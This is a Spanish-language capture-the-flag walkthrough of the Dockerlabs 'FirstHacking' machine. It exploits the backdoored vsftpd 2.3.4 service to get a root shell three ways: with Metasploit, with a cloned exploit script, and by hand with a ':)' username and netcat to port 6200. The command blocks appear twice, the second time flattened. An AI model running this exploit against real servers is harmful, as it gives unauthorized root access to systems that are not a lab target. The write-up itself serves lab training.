FirstHacking

TAG -> Dockerlabs | CTF

Datos

Máquina -> FirstHacking
Dificultad -> Muy Fácil
Creador -> El Pingüino de Mario

Lo primero que aremos es verificar conectividad con el servidor usando el comando ping.

❯ ping -c 1 172.17.0.2 -R
PING 172.17.0.2 (172.17.0.2) 56(124) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.110 ms
RR: 	172.17.0.1
		172.17.0.2
		172.17.0.2
		172.17.0.1

--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.110/0.110/0.110/0.000 ms

Con este resultado podemos ver una conexión exitosa con el servidor y ademas nos damos una idea que estamos frente a un Linux, creamos nuestras carpetas de trabajo con mkt y procedemos a hacer un escaneo primario.

❯ PortScanner -i 172.17.0.2 -t 1000 -s 2 -a V C -o recognition.txt

[+] Autor: Anonymous17
[+] Targeted: 172.17.0.2
[+] (TTL -> 64): Linux
[!] Escaneo de puertos (socket):

  [!] Puerto 21 abierto!
  [+] Port: 1000 / 1000 

[+] Lista de puertos abiertos: [21]
[+] Información de servicios y versiones:

  [+] 21/tcp    ftp       vsftpd 2.3.4

[+] Comprobando vulnerabilidades:

  [+] FTP parece seguro contra login anonymous

[*] Evidencia guardada en recognition.txt

En este punto podemos ir directos a searchsploit para comprobar vulnerabilidades asociadas a esta versión del servicio ftp.

❯ searchsploit vsftpd 2.3.4
-------------------------------------------------------------------------------
 Exploit Title                                           |  Path
-------------------------------------------------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)   | unix/remote/17491.rb
-------------------------------------------------------------------------------
Shellcodes: No Results

Hay 2 formas de vulnerar este equipo, la primera es usando Metasploit, de la siguiente manera.

[msf](Jobs:0 Agents:0) >> search vsftp

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor

[msf](Jobs:0 Agents:0) >> use 1
[*] No payload configured, defaulting to cmd/unix/interact
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run

[*] 172.17.0.2:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.17.0.2:21 - USER: 331 Please specify the password.
[+] 172.17.0.2:21 - Backdoor service has been spawned, handling...
[+] 172.17.0.2:21 - UID: uid=0(root) gid=0(root) groups=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.17.0.1:38421 -> 172.17.0.2:6200) at 2024-10-16 18:49:45 -0500

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

❯ python3 -m venv vsftpd2.4
❯ source vsftpd2.4/bin/activate
❯ pip3 install pwntools
❯ git clone https://github.com/Hellsender01/vsftpd_2.3.4_Exploit.git
Clonando en 'vsftpd_2.3.4_Exploit'...
remote: Enumerating objects: 53, done.
remote: Counting objects: 100% (53/53), done.
remote: Compressing objects: 100% (53/53), done.
remote: Total 53 (delta 28), reused 0 (delta 0), pack-reused 0 (from 0)
Recibiendo objetos: 100% (53/53), 41.30 KiB | 21.00 KiB/s, listo.
Resolviendo deltas: 100% (28/28), listo.
❯ cd vsftpd_2.3.4_Exploit
❯ python3 exploit.py 172.17.0.2
[+] Got Shell!!!
[+] Opening connection to 172.17.0.2 on port 21: Done
[*] Closed connection to 172.17.0.2 port 21
[+] Opening connection to 172.17.0.2 on port 6200: Done
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$

Esta vulnerabilidad se basa en poner :) en el campo de user y cualquier contraseña, lo que pasara es que la maquina victima se pondrá en escucha en el puerto 6200 si solicitamos este puerto con nc nos dará una shell con máximo privilegios, esto se da por que alguien infecto en los repositorios oficiales de ftp en 2011 y agrego esto a propósito, de esta manera cualquiera puede iniciar como root si el ftp tiene esta versión, ejecutemos el proceso manual.

En la maquina victima:

❯ ftp 172.17.0.2
Connected to 172.17.0.2.
220 (vsFTPd 2.3.4)
Name (172.17.0.2:victor): hello:)
331 Please specify the password.
Password:

Al presionar enter se pondrá en escucha y podremos ejecutar nc desde nuestra maquina.

❯ nc 172.17.0.2 6200
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

Con estos pasos podemos dar por concluida esta maquina.

PreviousDockHackLab Nextsjd

Last updated 4 months ago

❯ ping -c 1 172.17.0.2 -R PING 172.17.0.2 (172.17.0.2) 56(124) bytes of data. 64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.110 ms RR: 172.17.0.1 172.17.0.2 172.17.0.2 172.17.0.1 --- 172.17.0.2 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.110/0.110/0.110/0.000 ms

❯ PortScanner -i 172.17.0.2 -t 1000 -s 2 -a V C -o recognition.txt [+] Autor: Anonymous17 [+] Targeted: 172.17.0.2 [+] (TTL -> 64): Linux [!] Escaneo de puertos (socket): [!] Puerto 21 abierto! [+] Port: 1000 / 1000 [+] Lista de puertos abiertos: [21] [+] Información de servicios y versiones: [+] 21/tcp ftp vsftpd 2.3.4 [+] Comprobando vulnerabilidades: [+] FTP parece seguro contra login anonymous [*] Evidencia guardada en recognition.txt

❯ searchsploit vsftpd 2.3.4 ------------------------------------------------------------------------------- Exploit Title | Path ------------------------------------------------------------------------------- vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb ------------------------------------------------------------------------------- Shellcodes: No Results

[msf](Jobs:0 Agents:0) >> search vsftp Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service 1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor [msf](Jobs:0 Agents:0) >> use 1 [*] No payload configured, defaulting to cmd/unix/interact [msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set RHOSTS 172.17.0.2 RHOSTS => 172.17.0.2 [msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run [*] 172.17.0.2:21 - Banner: 220 (vsFTPd 2.3.4) [*] 172.17.0.2:21 - USER: 331 Please specify the password. [+] 172.17.0.2:21 - Backdoor service has been spawned, handling... [+] 172.17.0.2:21 - UID: uid=0(root) gid=0(root) groups=0(root) [*] Found shell. [*] Command shell session 1 opened (172.17.0.1:38421 -> 172.17.0.2:6200) at 2024-10-16 18:49:45 -0500 id uid=0(root) gid=0(root) groups=0(root) whoami root

❯ python3 -m venv vsftpd2.4 ❯ source vsftpd2.4/bin/activate ❯ pip3 install pwntools ❯ git clone https://github.com/Hellsender01/vsftpd_2.3.4_Exploit.git Clonando en 'vsftpd_2.3.4_Exploit'... remote: Enumerating objects: 53, done. remote: Counting objects: 100% (53/53), done. remote: Compressing objects: 100% (53/53), done. remote: Total 53 (delta 28), reused 0 (delta 0), pack-reused 0 (from 0) Recibiendo objetos: 100% (53/53), 41.30 KiB | 21.00 KiB/s, listo. Resolviendo deltas: 100% (28/28), listo. ❯ cd vsftpd_2.3.4_Exploit ❯ python3 exploit.py 172.17.0.2 [+] Got Shell!!! [+] Opening connection to 172.17.0.2 on port 21: Done [*] Closed connection to 172.17.0.2 port 21 [+] Opening connection to 172.17.0.2 on port 6200: Done [*] Switching to interactive mode $ id uid=0(root) gid=0(root) groups=0(root) $ whoami root $